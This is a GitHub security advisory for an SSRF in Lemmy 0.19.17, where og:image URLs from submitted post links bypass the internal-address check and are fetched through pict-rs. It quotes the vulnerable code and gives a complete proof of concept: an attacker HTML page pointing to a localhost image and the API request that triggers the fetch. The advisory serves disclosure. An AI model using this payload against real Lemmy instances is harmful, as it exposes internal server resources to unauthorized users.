Skip to content

SSRF and internal image disclosure in post link metadata via unvalidated og:image

Moderate
Nutomic published GHSA-h6hf-9846-xwrq Apr 20, 2026

Package

Lemmy

Affected versions

0.19.17

Patched versions

None

Description

Summary

Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction.

As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users.

Details

The metadata fetch logic applies an internal-address check only to the initial post URL. After HTML parsing, extract_opengraph_data() accepts absolute og:image values and returns them as-is. Later, generate_post_link_metadata() passes that second-hop image URL into generate_pictrs_thumbnail(), which instructs local pict-rs to fetch it through image/download?url=....

This creates a two-stage source-to-sink chain where the first URL is constrained, but the security boundary is bypassed through an unvalidated secondary resource.

Core vulnerable code path:

// crates/api_common/src/request.rs
let metadata = match &post.url {
  Some(url) => fetch_link_metadata(url, &context, false).await.unwrap_or_default(),
  _ => Default::default(),
};
// crates/api_common/src/request.rs
let og_image = page
  .opengraph
  .images
  .first()
  .and_then(|ogo| url.join(&ogo.url).ok());
// crates/api_common/src/request.rs
let thumbnail_url = if let (true, Some(url)) = (allow_generate_thumbnail, image_url.clone()) {
  generate_pictrs_thumbnail(&url, &context).await.ok().map(Into::into).or(image_url)
} else {
  image_url.clone()
};
// crates/api_common/src/request.rs
let fetch_url = format!(
  "{}image/download?url={}&resize={}",
  pictrs_config.url,
  encode(image_url.as_str()),
  context.settings().pictrs_config()?.max_thumbnail_size
);

These snippets show that only the outer page URL is checked, while the extracted og:image value becomes a server-side fetch target without an equivalent internal-address guard.

PoC

Prerequisites:

  • The attacker has a valid low-privileged account.
  • The instance uses the default link preview storage mode.
  • The attacker can post a link to a community they can access.

Practical reproduction flow:

  1. Host a public HTML page under attacker control.
  2. Add an Open Graph image tag whose value points to an internal image URL reachable from the Lemmy host, such as http://127.0.0.1:8081/internal.png.
  3. Create a Lemmy post whose url is the attacker-controlled page.
  4. Observe Lemmy fetch the public page, extract og:image, and then fetch the internal image through pict-rs.
  5. Observe the created post receive a local thumbnail URL, demonstrating that the internal image was retrieved and cached.

Complete PoC attacker page:

<html><head>
<meta property="og:image" content="http://127.0.0.1:8081/internal.png">
</head><body>x</body></html>

Complete PoC request:

POST /api/v3/post HTTP/1.1
Host: victim.example
Authorization: Bearer <low-priv-jwt>
Content-Type: application/json

{
  "name": "thumb-ssrf",
  "community_id": 1,
  "url": "https://attacker.example/og.html",
  "body": null,
  "alt_text": null,
  "honeypot": null,
  "nsfw": false,
  "language_id": null,
  "custom_thumbnail": null
}

Outcome:

  • The post creation request succeeds.
  • The internal image endpoint receives a request from the Lemmy server.
  • The created post is updated with a local thumbnail_url, indicating that the internal image was fetched and cached.

Impact

This issue upgrades an attacker-controlled external page into an internal image fetch primitive. It can be used to retrieve internal image resources, expose content that is otherwise reachable only from the application host, and publish those internal resources through Lemmy's own thumbnail serving path.

Because the vulnerable mode is the documented default behavior for link previews, the issue is relevant even without non-default privacy settings.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE ID

CVE-2026-42181

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.